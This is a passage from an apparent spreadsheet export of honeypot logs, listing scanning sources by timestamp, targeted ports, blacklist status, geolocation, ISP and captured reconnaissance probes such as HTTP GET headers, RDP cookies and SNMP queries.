    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H34"/>
    <s v="23&amp;&amp;8694&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ET"/>
    <s v="Ethiopia"/>
    <s v="AA"/>
    <s v="Addis Ababa"/>
    <s v="Arada"/>
    <s v="Addis Ababa"/>
    <s v="344979"/>
    <s v="NA"/>
    <s v="9.02427"/>
    <s v="38.7519"/>
    <s v="24757"/>
    <s v="EthioNet"/>
    <s v="Ethiotelecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4be:378"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="868"/>
    <x v="868"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T06:57:30"/>
    <d v="2025-03-23T08:01:25"/>
    <d v="2025-04-25T06:57:30"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="47540&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="46"/>
    <s v="Jeollanam-do"/>
    <s v="Wando-gun"/>
    <s v="Wando-gun"/>
    <s v="1833493"/>
    <s v="537-880"/>
    <s v="34.3111"/>
    <s v="126.755"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Jeonnambonbujang"/>
    <s v="2009-11-04"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b769:e099"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="869"/>
    <x v="869"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T06:38:25"/>
    <d v="2025-04-24T05:16:34"/>
    <d v="2025-04-25T06:38:25"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abed:d5e1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="870"/>
    <x v="870"/>
    <s v="zaqdb738e31.rev.zaq.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-25T06:11:15"/>
    <d v="2025-03-11T17:26:04"/>
    <d v="2025-04-25T06:11:15"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6906"/>
    <s v="139.77"/>
    <s v="9617"/>
    <s v="JCOM Co., Ltd."/>
    <s v="JCOM"/>
    <s v="business"/>
    <s v="J:COM WEST Co., Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:db73:8e31"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="871"/>
    <x v="871"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T04:53:27"/>
    <d v="2025-04-23T00:51:22"/>
    <d v="2025-04-25T04:53:27"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="40"/>
    <s v="Calabarzon"/>
    <s v="Rizal"/>
    <s v="Malanday"/>
    <s v="1703116"/>
    <s v="NA"/>
    <s v="14.706900000000001"/>
    <s v="121.131"/>
    <s v="132199"/>
    <s v="Globe Telecom Inc."/>
    <s v="Globe Telecom"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:781c:52e0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="872"/>
    <x v="872"/>
    <s v="jarrod.probe.onyphe.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-25T03:41:54"/>
    <d v="2023-11-29T01:47:07"/>
    <d v="2025-04-25T03:41:54"/>
    <n v="247"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_DNS_H40&amp;&amp;SMA-LAB_SMB_H13&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_IPP_H5&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;8443&amp;&amp;53&amp;&amp;445&amp;&amp;22&amp;&amp;5900&amp;&amp;1080&amp;&amp;9100&amp;&amp;443&amp;&amp;389&amp;&amp;80&amp;&amp;631&amp;&amp;25983&amp;&amp;34839"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="MD"/>
    <s v="Madrid"/>
    <s v="Madrid"/>
    <s v="Madrid"/>
    <s v="3117735"/>
    <s v="28070"/>
    <s v="40.4168"/>
    <s v="-3.70379"/>
    <s v="16276"/>
    <s v="OVH SAS"/>
    <s v="OVH SAS"/>
    <s v="hosting"/>
    <s v="ONYPHE"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:33fe:3160"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="873"/>
    <x v="873"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T03:24:49"/>
    <d v="2024-12-29T09:33:47"/>
    <d v="2025-04-25T03:24:49"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Samrāla"/>
    <s v="1257503"/>
    <s v="NA"/>
    <s v="30.836"/>
    <s v="76.1932"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:f7c"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="874"/>
    <x v="874"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T03:05:36"/>
    <d v="2025-04-10T02:41:27"/>
    <d v="2025-04-25T03:05:36"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-Business"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75df:5e4c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="875"/>
    <x v="875"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T02:50:59"/>
    <d v="2023-11-27T06:07:40"/>
    <d v="2025-04-25T02:50:59"/>
    <n v="488"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_RDP_H24&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_NTP_H37&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_NTP_H2&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_NTP_H28&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_LDAP_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;161&amp;&amp;6341&amp;&amp;23&amp;&amp;6379&amp;&amp;9100&amp;&amp;21&amp;&amp;80&amp;&amp;1080&amp;&amp;1521&amp;&amp;443&amp;&amp;5432&amp;&amp;3389&amp;&amp;110&amp;&amp;1433&amp;&amp;50494&amp;&amp;NA&amp;&amp;53557&amp;&amp;3306&amp;&amp;56982&amp;&amp;389&amp;&amp;55993&amp;&amp;49569&amp;&amp;6667&amp;&amp;445&amp;&amp;5900&amp;&amp;57043&amp;&amp;63020&amp;&amp;53083&amp;&amp;50825&amp;&amp;49490&amp;&amp;63820&amp;&amp;56501"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']}"/>
    <n v="138"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA&amp;&amp;query&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jgyIbIxEG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CNqrQd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WpfmBm'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,64404)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,64408)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,64410)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=leChfxmZQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tQGZId'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jjJlWM'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,62838)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,62844)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,62850)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ByRbKMisq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CnFkBE'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=beLOxo'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xprRmgzPe'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:18ba"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="876"/>
    <x v="876"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T02:30:00"/>
    <d v="2025-02-14T20:16:28"/>
    <d v="2025-04-25T02:30:00"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Malappuram"/>
    <s v="Manjeri"/>
    <s v="1263694"/>
    <s v="NA"/>
    <s v="11.1202"/>
    <s v="76.12"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
